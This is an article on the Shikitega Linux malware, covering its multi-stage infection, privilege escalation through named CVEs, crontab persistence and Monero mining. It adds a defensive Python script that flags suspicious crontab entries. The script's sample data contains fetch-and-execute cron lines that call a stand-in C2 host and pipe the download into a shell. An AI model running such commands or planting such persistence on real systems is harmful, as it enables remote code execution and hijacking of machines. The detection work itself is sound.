Shikitega, a new type of stealthy Linux malware that uses a multi-stage infection chain to infiltrate endpoints and IoT devices and deposit further payloads, has been found.
According to a report released recently by AT&T Alien Labs, an attacker can gain complete control of an infected machine, in addition to the bitcoin miner that is launched and configured to persist. The discovery adds to the growing number of Linux malware families recently found in the wild, including OrBit, Syslogk, BPFDoor, Symbiote, and Lightning Framework.
Once installed on a target host, the attack chain downloads and runs the Metasploit “Mettle” meterpreter to maximize its control over the machine. It then exploits vulnerabilities to gain elevated privileges, establishes persistence on the host using crontab, and finally starts a cryptocurrency miner on the infected device. Although the exact means of initial intrusion are still unknown, Shikitega is elusive because of its ability to download next-stage payloads from a command-and-control (C2) server and execute them directly in memory.
By abusing CVE-2021-4034 (also known as PwnKit) and CVE-2021-3493, the attacker gains elevated permissions and uses them to retrieve and run the last-stage shell scripts as root, establishing persistence and deploying the Monero crypto miner. To further evade detection, the malware’s operators use the “Shikata ga nai” polymorphic encoder, which makes it harder for antivirus engines to detect the payload, and rely on legitimate cloud services for C2 activity.
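The crontab persistence and fetch-and-execute behaviour described above are the parts of the chain a defender can audit on a host. The following script is an added example, not code from the AT&T Alien Labs report: it parses crontab entries and flags those that download content and pipe it straight into a shell or run from a world-writable temp directory. The sample crontab lines and the c2.example.invalid host are constructed for illustration.

```python
import re
from typing import Dict, List

# Constructed sample crontab (not from the report). The last two entries
# imitate the fetch-and-execute persistence pattern described in the article.
SAMPLE_CRONTAB = """
# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update
*/5 * * * * /usr/local/bin/backup.sh >/dev/null 2>&1
@reboot curl -s http://c2.example.invalid/stage2 | sh
* * * * * wget -qO- http://c2.example.invalid/a.sh | bash -s >/dev/null 2>&1
"""

DOWNLOADER = re.compile(r"\b(curl|wget|fetch)\b")
PIPED_TO_SHELL = re.compile(r"\|\s*(sh|bash|dash|zsh)\b")
TEMP_DIR = re.compile(r"(^|\s)(/tmp|/dev/shm|/var/tmp)/")


def parse_crontab(text: str) -> List[Dict[str, str]]:
    """Split crontab text into {schedule, command} entries, skipping comments."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):                  # @reboot, @hourly, ...
            schedule, _, command = line.partition(" ")
        else:
            parts = line.split(None, 5)           # five time fields + command
            if len(parts) < 6:
                continue
            schedule, command = " ".join(parts[:5]), parts[5]
        entries.append({"schedule": schedule, "command": command})
    return entries


def suspicious_entries(text: str) -> List[Dict[str, str]]:
    """Return entries whose command matches a download-and-run persistence pattern."""
    flagged = []
    for entry in parse_crontab(text):
        cmd, reasons = entry["command"], []
        if DOWNLOADER.search(cmd) and PIPED_TO_SHELL.search(cmd):
            reasons.append("downloads content and pipes it directly into a shell")
        if TEMP_DIR.search(cmd):
            reasons.append("executes from a world-writable temp directory")
        if reasons and (entry["schedule"] == "@reboot" or entry["schedule"].startswith("* * * * *")):
            reasons.append("aggressive schedule (@reboot or every minute)")
        if reasons:
            flagged.append({**entry, "reason": "; ".join(reasons)})
    return flagged


if __name__ == "__main__":
    for hit in suspicious_entries(SAMPLE_CRONTAB):
        print(f"[{hit['schedule']}] {hit['command']}\n    -> {hit['reason']}")
```

On a live host the same function can be fed the output of `crontab -l` for each user and the contents of /etc/crontab and /etc/cron.d/*.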
“Threat actors continue to search for ways to deliver malware in new ways to stay under the radar and avoid detection,” said AT&T Alien Labs researcher Ofer Caspi. “Shikitega malware is delivered in a sophisticated way: it uses a polymorphic encoder, and it gradually delivers its payload, where each step reveals only part of the total payload.”